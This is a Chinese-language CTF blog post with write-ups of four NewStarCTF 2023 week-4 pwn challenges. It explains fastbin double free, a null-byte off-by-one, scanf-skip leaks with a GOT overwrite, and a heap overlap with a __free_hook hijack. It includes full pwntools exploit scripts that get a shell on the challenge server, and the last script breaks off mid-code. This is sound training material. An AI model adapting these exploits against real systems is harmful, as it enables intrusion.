<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="Walt CSZ">
    
    
    
    
    
    
    <title>newstarctf | Walt&#39;s Blog</title>
    <link href="http://waltcsz.github.io" rel="prefetch" />

    
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/aos.css">
<link rel="stylesheet" href="/css/style.css">

    
<script src="/js/jquery.min.js"></script>

    
<script src="/js/bootstrap.min.js"></script>

    
<script src="/js/aos.js"></script>

    
<script src="/js/highslide/highslide-full.min.js"></script>

    
<link rel="stylesheet" href="/js/highslide/highslide.css">

    <style type="text/css">
        @media (max-width: 768px) {
            body {
                background-color: #f0f0f0;
                background: url('/imgs/xsbg.gif');
                background-attachment: fixed;
            }
        }
    </style>
    
    <!--<script type="text/javascript">
      if (document.images) {
        var avatar = new Image();
        avatar.src = '/imgs/avatar.jpg'
        var previews = 'preview1.jpg,preview2.jpg,preview3.jpg,preview4.jpg'.split(',')
        var previewsPreLoad = []
        for(var i = 0; i < length; i++) {
          previewsPreLoad.push(new Image())
          previewsPreLoad[previewsPreLoad.length - 1].src = '/imgs/preview' + previews[i]
        }
      }
    </script>-->
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <!-- 背景轮播图功能 -->
    <section class="hidden-xs">
    <ul class="cb-slideshow">
        <li><span>天若</span></li>
        <li><span>有情</span></li>
        <li><span>天亦老</span></li>
        <li><span>我为</span></li>
        <li><span>长者</span></li>
        <li><span>续一秒</span></li>
    </ul>
</section>
    <!-- 欧尼酱功能, 谁用谁知道 -->
    
    <header class="navbar navbar-inverse" id="gal-header">
    <div class="container">
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target=".bs-navbar-collapse"
                    aria-expanded="false">
                <span class="fa fa-lg fa-reorder"></span>
            </button>
            <a href="http://waltcsz.github.io">
                
                <style>
                    #gal-header .navbar-brand {
                        height: 54px;
                        line-height: 24px;
                        font-size: 28px;
                        opacity: 1;
                        background-color: rgba(0,0,0,0);
                        text-shadow: 0 0 5px #fff,0 0 10px #fff,0 0 15px #fff,0 0 20px #228DFF,0 0 35px #228DFF,0 0 40px #228DFF,0 0 50px #228DFF,0 0 75px #228DFF;
                    }
                </style>
                <!-- 这里使用文字(navbar_text or config.title) -->
                <div class="navbar-brand">Walt&#39;s Blog</div>
                
            </a>
        </div>
        <div class="collapse navbar-collapse bs-navbar-collapse">
            <ul class="nav navbar-nav" id="menu-gal">
                
                
                <li class="">
                    <a href="/">
                        <i class="fa fa-home"></i>首页
                    </a>
                </li>
                
                
                
                <li class="">
                    <a href="/archives">
                        <i class="fa fa-archive"></i>归档
                    </a>
                </li>
                
                
                
                
                <li class="dropdown">
                    <!-- TODO 添加hover dropdown效果 -->
                    <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                       aria-haspopup="true" aria-expanded="false" data-hover="dropdown">
                        <i class="fa fa-list"></i>分类
                    </a>
                    <ul class="dropdown-menu">
                        
                        
                        <li>
                            <a href="/categories/writeup/">writeup</a>
                        </li>
                        
                        
                        
                    </ul>
                </li>
                
                
                
                
                
                <li class="">
                    <a href="/tags">
                        <i class="fa fa-tags"></i>标签
                    </a>
                </li>
                
                
                
                
                <li class="">
                    <a href="/about">
                        <i class="fa fa-user"></i>关于我
                    </a>
                </li>
                
                
            </ul>
        </div>
    </div>
</header>
    <div id="gal-body">
        <div class="container">
            <div class="row">
                <div class="col-md-8 gal-right" id="mainstay">
                    
<article class="article well article-body" id="article">
    <div class="breadcrumb">
        <i class="fa fa-home"></i>
        <a href="http://waltcsz.github.io">Walt&#39;s Blog</a>
        >
        <span>newstarctf</span>
    </div>
    <!-- 大型设备详细文章 -->
    <div class="hidden-xs">
        <div class="title-article">
            <h1>
                <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
            </h1>
        </div>
        <div class="tag-article">
            
            <span class="label label-gal">
                <i class="fa fa-calendar"></i> 2023-10-20
            </span>
            
        </div>
    </div>
    <!-- 小型设备详细文章 -->
    <div class="visible-xs">
        <center>
            <div class="title-article">
                <h4>
                    <a href="/2023/10/20/writeUp/newstarctf/">newstarctf</a>
                </h4>
            </div>
            <p>
                <i class="fa fa-calendar"></i> 2023-10-20
            </p>
            <p>
                
                
            </p>
        </center>
    </div>
    <div class="content-article">
        <h1 id="newstartctf2023-week4-pwn"><a href="#newstartctf2023-week4-pwn" class="headerlink" title="newstartctf2023_week4 pwn"></a>newstartctf2023_week4 pwn</h1><h2 id="Double"><a href="#Double" class="headerlink" title="Double"></a>Double</h2><p>堆heap, double_free, fastbin</p>
<p>libc: 2.23</p>
<p>程序中功能选择只有创建<code>add()</code>，删除<code>del()</code>和检查<code>check()</code>。其中，<code>check()</code>内存在后门函数，只要0x602070处的值为1638，即可直接getsshell。</p>
<p>其次，<code>del()</code>中释放块后没有清除指针，可以进行double free。因此只要在0x602070处伪造块，并设置值为1638。</p>
<p><code>add()</code>中固定分配0x28大小的块，并且同时写入内容。释放后进入fastbin。</p>
<blockquote>
<p>实际占用0x30空间，释放后进入fastbin[1]</p>
</blockquote>
<h3 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h3><p>分配2个chunk，序号分别为0、1，然后按0、1、0的顺序释放chunk，这样0号chunk在fastbin中存在2次构成闭环。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">fastbin[1] -&gt; chunk0 -&gt; chunk1 -&gt; chunk0 (-&gt;chunk1)<br></code></pre></td></tr></table></figure>

<p>再次分配一个块，此时分配到0号chunk，在其中输入0x602070的编码。此时fastbin[1]中即为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">fastbin[1] -&gt; chunk1 —&gt; chunk0 -&gt; 0x602070<br></code></pre></td></tr></table></figure>

<p>再分配3次，在第3次时输入内容1638，然后选择进入<code>check()</code>。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">25043</span>)<br><span class="hljs-comment">#p=process(&#x27;./Double_pe&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b *0x400B3C&#x27;)</span><br><br>target = <span class="hljs-number">0x602070</span><br>num = <span class="hljs-number">1638</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">choose</span>(<span class="hljs-params">x</span>):<br>    p.recvuntil(<span class="hljs-string">b&#x27;&gt;\n&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(x).encode())<br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">mal</span>(<span class="hljs-params">index, content</span>):<br>    choose(<span class="hljs-number">1</span>)<br>    p.sendlineafter(<span class="hljs-string">b&#x27;Input idx\n&#x27;</span>, <span class="hljs-built_in">str</span>(index).encode())<br>    p.sendlineafter(<span class="hljs-string">b&#x27;Input content\n&#x27;</span>, content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">2</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;Input idx\n&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(index).encode())<br><br><br>mal(<span class="hljs-number">0</span>, <span class="hljs-string">b&#x27;a0&#x27;</span>)<br>mal(<span class="hljs-number">1</span>, <span class="hljs-string">b&#x27;a1&#x27;</span>)<br>free(<span class="hljs-number">0</span>)<br>free(<span class="hljs-number">1</span>)<br>free(<span class="hljs-number">0</span>)<br>mal(<span class="hljs-number">0</span>,p64(target-<span class="hljs-number">0x10</span>))<br>mal(<span class="hljs-number">1</span>,<span class="hljs-string">b&#x27;b0&#x27;</span>)<br>mal(<span class="hljs-number">0</span>,<span class="hljs-string">b&#x27;b1&#x27;</span>)<br>mal(<span class="hljs-number">2</span>, p64(num))<br>choose(<span class="hljs-number">3</span>)<br>p.interactive()<br><br></code></pre></td></tr></table></figure>



<h2 id="game"><a href="#game" class="headerlink" title="game"></a>game</h2><p>NULL_byte_off-by-one in stack, libc 偏移</p>
<p>或许这道题属于re？而且这道题含utf-8字符，写脚本还不好写。</p>
<h3 id="程序流程"><a href="#程序流程" class="headerlink" title="程序流程"></a>程序流程</h3><p>程序大致流程如下：</p>
<ul>
<li>先选择角色，选择三月七或派蒙。</li>
<li>然后进入主循环。主循环中，可以选择送原石（接委托）或者送kfc联名套餐（对肯德基爷爷说话）。其中，原神玩家只能接委托，崩铁玩家只能对肯德基爷爷说话，否则都会直接退出。</li>
<li>接委托中，会让v7增加0x10000（起始为0）。其次，如果v7大于0x3ffff，即执行了4次以上委托，就会泄露system函数的地址。</li>
<li>对话中，使用read函数向栈上输入值。这里存在漏洞，如果没有输入回车作为结尾，会自动在字符串最后添加<code>&#39;\0&#39;</code>，在输入8个非回车字节后直接覆盖第9字节，可以修改相邻的变量。而该变量标识了玩家选择的角色，1为三月七，0为派蒙。覆盖为0后，可以从对话转为接委托。</li>
</ul>
<p><img src="/./image-20231019173000077.png" alt="image-20231019173000077"></p>
<h3 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h3><p>在主函数最后，会执行<code>&amp;puts-v3-v7</code>处的函数，以v5作为变量。因此调整对应函数地址为system的地址，让v5指向<code>&quot;/bin/sh\0&quot;</code>，即可实现getshell。</p>
<p>其中，进入该分支的前提是，主菜单选择时输入3，并且执行过接委托和对话。而利用read函数处的漏洞即可实现。v7的值即执行委托时累加的值，v3的值当场输入，但只能输入short类型，即只能输入范围在-32768~32767的值。</p>
<p><img src="/./image-20231019173843622.png" alt="image-20231019173843622"></p>
<h4 id="计算偏移"><a href="#计算偏移" class="headerlink" title="计算偏移"></a>计算偏移</h4><p>首先计算puts函数和system函数的偏移。这个利用题目所给的libc.so.6文件即可直接算出，不需要先泄露再去计算，因为这边只需要偏移不需要绝对地址。所以接委托中泄露system地址的功能可有可无。利用pwintools算一算。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><br>libc = ELF(<span class="hljs-string">&#x27;./libc-2.31.so&#x27;</span>)<br><br>sys_a = libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>puts_a = libc.sym[<span class="hljs-string">&#x27;puts&#x27;</span>]<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;puts: <span class="hljs-subst">&#123;puts_a:#x&#125;</span>, system: <span class="hljs-subst">&#123;sys_a:#x&#125;</span>&quot;</span>)<br><span class="hljs-comment">#bs_a = libcbase + next(libc.search(b&#x27;/bin/sh&#x27;))</span><br><br>offset = puts_a - sys_a<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;offset: <span class="hljs-subst">&#123;offset:#x&#125;</span>&quot;</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>): <br>    v3 = offset - i*<span class="hljs-number">0x10000</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;i&#125;</span>: v3=<span class="hljs-subst">&#123;v3&#125;</span>&quot;</span>)<br><br><br></code></pre></td></tr></table></figure>

<p><img src="/./image-20231019174341968.png" alt="image-20231019174341968"></p>
<p>两者偏移为205200，只有在v7为0x30000时，v3才能控制在short范围内，即8592。</p>
<p>v5的值即为与肯德基老爷爷对话的内容，所以对话时输入<code>&quot;/bin//sh&quot;</code>，刚好8字节。</p>
<blockquote>
<p>懒得写脚本实现了，不然我更喜欢&#x2F;bin&#x2F;sh\0</p>
</blockquote>
<p><img src="/./image-20231019174720038.png" alt="image-20231019174720038"></p>
<h2 id="message-board"><a href="#message-board" class="headerlink" title="message board"></a>message board</h2><p>scanf 漏洞, got 劫持</p>
<p>主函数中，存在任意地址写入，但首先会经过board函数。</p>
<p>在board函数中，可以自定义选择往栈上利用scanf输入最多15个字节。接着，会要求输入puts的真实地址，输入错误直接结束程序。</p>
<h3 id="泄露地址"><a href="#泄露地址" class="headerlink" title="泄露地址"></a>泄露地址</h3><p>scanf函数可以利用非数字字符跳过输入，而这样的操作不会改变对应地址原本的值。但是如果输入大部分非数字字符，scanf读取后跳过，但不会将该字符从缓冲区中拿走，因此，该程序后续的所有scanf都会直接跳过，包括要求输入puts地址的。但是，如果输入的是<code>&#39;+&#39;</code>，那么只会忽略当前的<code>&quot;%d&quot;</code>，应该是因为+作为正负号吧。</p>
<p>跳过大量scanf，我们可以拿到很多栈上数据。</p>
<p><img src="./image-20231019180236594.png" alt="image-20231019180236594" style="zoom:50%;" /><img src="/./image-20231019180408010.png" alt="image-20231019180408010"></p>
<p>其中，可以通过黄色的地址推算栈上地址。可以通过紫色地址推算libc基址。</p>
<p>利用<code>_IO_2_1_stdeer_</code>推算libc基地址，然后查库算出puts真实地址并输入，即可进入主函数。</p>
<p>在主函数中，由于没有对下标进行检测，所以我们拥有两次修改任意地址4字节的机会。但由于输入均为输入32位整数，且a数组处于.bss段，所以够不到libc处或者栈空间，但是可以够到got表，且只开了Partial RELRO保护，got可写。<img src="./image-20231019181238330.png" alt="image-20231019181238330" style="zoom:67%;" /></p>
<p>在主函数最后执行了<code>exit(0)</code>，因此我们可以将got表中exit的值修改为one_gadget，便可以直接执行getshell。</p>
<h3 id="计算下标"><a href="#计算下标" class="headerlink" title="计算下标"></a>计算下标</h3><p>a数组的地址为0x4040A0，而got表exit项的地址为0x404030，因此偏移为<code>offset=0x404030-0x4040A0=-0x70</code>，下标应为<code>idx=offset/4=-0x70/0x4=-0x1c=-28</code>。而one_gadget长度超过4字节，应分两次写入，刚好用完两次机会。第一次往<code>idx=-28</code>处写入地址低4位字节<code>onegadget&amp;0xffffffff</code>，第二次往<code>idx+1=-27</code>处写入高4位字节<code>onegadget&gt;&gt;32</code>。</p>
<h3 id="one-gadget获取"><a href="#one-gadget获取" class="headerlink" title="one_gadget获取"></a>one_gadget获取</h3><p>利用one_gadget工具。获取了该libc版本的3个one_gadget。</p>
<p><img src="/./image-20231019182348766.png" alt="image-20231019182348766"></p>
<p>在程序运行到最后exit时，rdi和rsi寄存器值为0，可以使用第三个one_gadget。</p>
<p><img src="/./image-20231019182306437.png" alt="image-20231019182306437"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>e=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><span class="hljs-comment">#p=process(&#x27;./pwn_pe&#x27;)</span><br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">28040</span>)<br><span class="hljs-comment">#gdb.attach(p, &#x27;b *0x401336&#x27;)</span><br><br>offset = <span class="hljs-number">0x0</span><br>payload = <span class="hljs-string">b&#x27;a&#x27;</span>*offset <br><br><span class="hljs-comment">#p.send(payload)</span><br><br>p.sendline(<span class="hljs-string">b&#x27;15&#x27;</span>)<br>strerr = <span class="hljs-number">0</span><br>stack1 = <span class="hljs-number">0</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">15</span>):<br>    p.sendline(<span class="hljs-string">b&#x27;+&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;is &#x27;</span>)<br>    <span class="hljs-keyword">if</span> i == <span class="hljs-number">1</span>:<br>        strerr = <span class="hljs-built_in">int</span>(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>],<span class="hljs-number">10</span>)<br>    <span class="hljs-keyword">if</span> i == <span class="hljs-number">12</span>:<br>        stack1 = <span class="hljs-built_in">int</span>(p.recvuntil(<span class="hljs-string">b&#x27;\n&#x27;</span>)[:-<span class="hljs-number">1</span>],<span class="hljs-number">10</span>)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;strerr:%#x, stack:%#x&quot;</span>%(strerr,stack1))<br><br>libc = ELF(<span class="hljs-string">&#x27;./libc-2.31.so&#x27;</span>)<br>libcbase = strerr - libc.sym[<span class="hljs-string">&#x27;_IO_2_1_stderr_&#x27;</span>]<br><span class="hljs-comment">#if offine, libcbase need add 0x30</span><br><br>sys_a = libcbase + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>bs_a = libcbase + <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>))<br>puts_a = libcbase + libc.sym[<span class="hljs-string">&#x27;puts&#x27;</span>]<br><span class="hljs-comment">#rtld = libcbase + libc.sym[&#x27;_rtld_global&#x27;]</span><br>rtld = libcbase + <span class="hljs-number">0x222030</span><br><br>one_gadget = libcbase + <span class="hljs-number">0xe3b01</span><br>exit_hook = rtld + <span class="hljs-number">3848</span><br>exit_g = <span class="hljs-number">0x404030</span><br>a = <span class="hljs-number">0x4040A0</span><br>index = (exit_g-a)//<span class="hljs-number">4</span><br><br>p.recvuntil(<span class="hljs-string">b&#x27;Now please enter the verification code\n&#x27;</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(puts_a).encode())<br><br>p.recvuntil(<span class="hljs-string">b&#x27;You can modify your suggestions\n&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;rtld-libc %#x&quot;</span>%libc.sym[<span class="hljs-string">&#x27;_rtld_global&#x27;</span>])<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;libcbase %#x&quot;</span>%libcbase)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;rtld: <span class="hljs-subst">&#123;rtld:#x&#125;</span>, exithook: <span class="hljs-subst">&#123;exit_hook:#x&#125;</span>, sys_a: <span class="hljs-subst">&#123;sys_a:#x&#125;</span>&quot;</span>)<br><br><br><span class="hljs-keyword">assert</span> (exit_hook-a)%<span class="hljs-number">4</span> == <span class="hljs-number">0</span><br><span class="hljs-keyword">assert</span> index &lt;= <span class="hljs-number">0x7fffffff</span><br>p.sendline(<span class="hljs-built_in">str</span>(index).encode())<br>p.recvuntil(<span class="hljs-string">b&#x27;input new suggestion\n&#x27;</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(one_gadget&amp;<span class="hljs-number">0xffffffff</span>).encode())<br>p.recvuntil(<span class="hljs-string">b&#x27;You can modify your suggestions\n&#x27;</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(index+<span class="hljs-number">1</span>).encode())<br>p.recvuntil(<span class="hljs-string">b&#x27;input new suggestion\n&#x27;</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(one_gadget&gt;&gt;<span class="hljs-number">32</span>).encode())<br><br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<blockquote>
<p>原本想过去修改_rtld_global中的exit_hook，但是后面发现够不着，而且明明可以直接改exit的。</p>
</blockquote>
<h2 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h2><p>堆heap, chunk_extend_and_overlapping, use_after_free, free_hook, one_gadget</p>
<p>libc: 2.31</p>
<h3 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h3><p>程序中功能选择有创建<code>add()</code>，释放<code>delete()</code>，显示<code>show()</code>，编辑<code>edit()</code>。</p>
<h4 id="add函数"><a href="#add函数" class="headerlink" title="add函数"></a>add函数</h4><p>总共可以分配15个chunk，不能覆盖已有chunk的地址，且由于释放chunk时不清空指针，所以共可以分配15次chunk。</p>
<p>每次分配中，先分配固定的0x20的空间（实际占用0x30），这里称为head chunk，其地址放在notebook数组中。然后再分配一个对应输入大小的块，称为real chunk，其大小会储存在notesize数组。headchunk会储存real chunk的大小，以及储存real chunk的地址(headchunk+0x18)。</p>
<h4 id="delete函数"><a href="#delete函数" class="headerlink" title="delete函数"></a>delete函数</h4><p>这个delete函数是个有缺陷的函数。它只会free掉对应的head chunk，而real chunk完全不free的。也就是只会free掉储存在notebook数组的地址对应的chunk。</p>
<h4 id="show函数"><a href="#show函数" class="headerlink" title="show函数"></a>show函数</h4><p>输出real chunk 的值，也就是先读取notebook对应的head chunk，然后输出head chunk中的第24个字节开始的地址对应的内容。</p>
<h4 id="edit函数"><a href="#edit函数" class="headerlink" title="edit函数"></a>edit函数</h4><p>编辑函数，但是存在检查。</p>
<p>会检查head chunk的储存的size与notesize储存的是否一致。如果一致，可直接向head chunk储存的地址写入内容。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="任意地址读写"><a href="#任意地址读写" class="headerlink" title="任意地址读写"></a>任意地址读写</h4><p>经典的带有head chunk的题。释放两个headchunk，这时如果请求一个与headchunk大小一致的realchunk，那么realchunk会分配到其中一个已经释放的headchunk处。这样我们就有办法free掉real chunk了。</p>
<p>后续按在堆中出现顺序称呼headchunk和realchunk，如head0, head1, real0, real1</p>
<p><img src="/./1.png" alt="1"></p>
<p>其次，这样操作后，head0指向head2，因此便可以利用ehad0修改head1的值，保留size值不变，修改地址为目标地址，这样就可以利用head1配合edit函数实现任意地址读写。可以修改如<code>__free_hook</code>的值，将其修改为one_gadget然后执行free(0)实现getshell。</p>
<p>这时head1还残留着指向real1的值，只要将前0x18个字节填充了，即可将其泄露。</p>
<h4 id="泄露libc地址"><a href="#泄露libc地址" class="headerlink" title="泄露libc地址"></a>泄露libc地址</h4><p>要实现这个目的需要泄露libc地址，然后才能计算<code>__free_hook</code>和one_gadget的地址。而泄露libc的方法则是free掉一个较大的chunk，该chunk会被放入unsorted bin，其fd和bk即为mainarena+96的值，可以利用其计算libc的基址。利用UAF读取该地址。tcache的大小最大为0x410，因此释放的chunk需要大于该值。</p>
<p>由于能free掉的只有headchunk，即使创建了一个大chunk也free不掉。因此可以利用任意地址读写，修改某个headchunk的头，使其变为一个大chunk。大小记得与其他chunk对齐。然后释放对应headchunk，再将其fd打印，也就是mainarena+96的地址。</p>
<h3 id="步骤-1"><a href="#步骤-1" class="headerlink" title="步骤"></a>步骤</h3><p>先分配4次块，第三次分配块的大小为<code>0x420-0x28-0x10</code>，目的是让修改后的0x420大小的head2对齐head3。然后free掉前两个headchunk，构造任意地址读写。这时填充head1泄露堆地址。然后去计算h2的真实地址。</p>
<p>这里懒得一个个构造head1了，所以写了个python类。传入要修改的地址，通过head0写入head1，然后通过head1往目标地址读写。第一次操作修改head2的头为0x421，然后释放head2泄露libc地址。第二次操作修改free_hook为one_gadget。最后执行一次free函数getshell。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>p=remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="hljs-number">29440</span>)<br><span class="hljs-comment">#p=process(&#x27;./pwn_pe&#x27;)</span><br><span class="hljs-comment">#gdb.attach(p, &#x27;b *$rebase(0x1837)&#x27;)</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">choose</span>(<span class="hljs-params">x</span>):<br>    p.recvuntil(<span class="hljs-string">b&#x27;&gt;&gt;\n&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(x).encode())<br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">mal</span>(<span class="hljs-params">index, content, size=<span class="hljs-number">0x28</span></span>):<br>    choose(<span class="hljs-number">1</span>)<br>    p.sendafter(<span class="hljs-string">b&#x27;enter idx(0~15): \n&#x27;</span>, <span class="hljs-built_in">str</span>(index).encode())<br>    p.sendafter(<span class="hljs-string">b&#x27;enter size: \n&#x27;</span>, <span class="hljs-built_in">str</span>(size).encode())<br>    p.sendlineafter(<span class="hljs-string">b&#x27;write the note: \n&#x27;</span>, content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">index</span>):<br>    choose(<span class="hljs-number">2</span>)<br>    p.recvuntil(<span class="hljs-string">b&#x27;enter idx(0~15): \n&#x27;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(index).encode())<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">index, content</span>):<br>    choose(<span class="hljs-number">4</span>)<br>    p.sendafter(<span class="hljs-string">b&#x27;enter idx(0~15): \n&#x27;</span>, <span 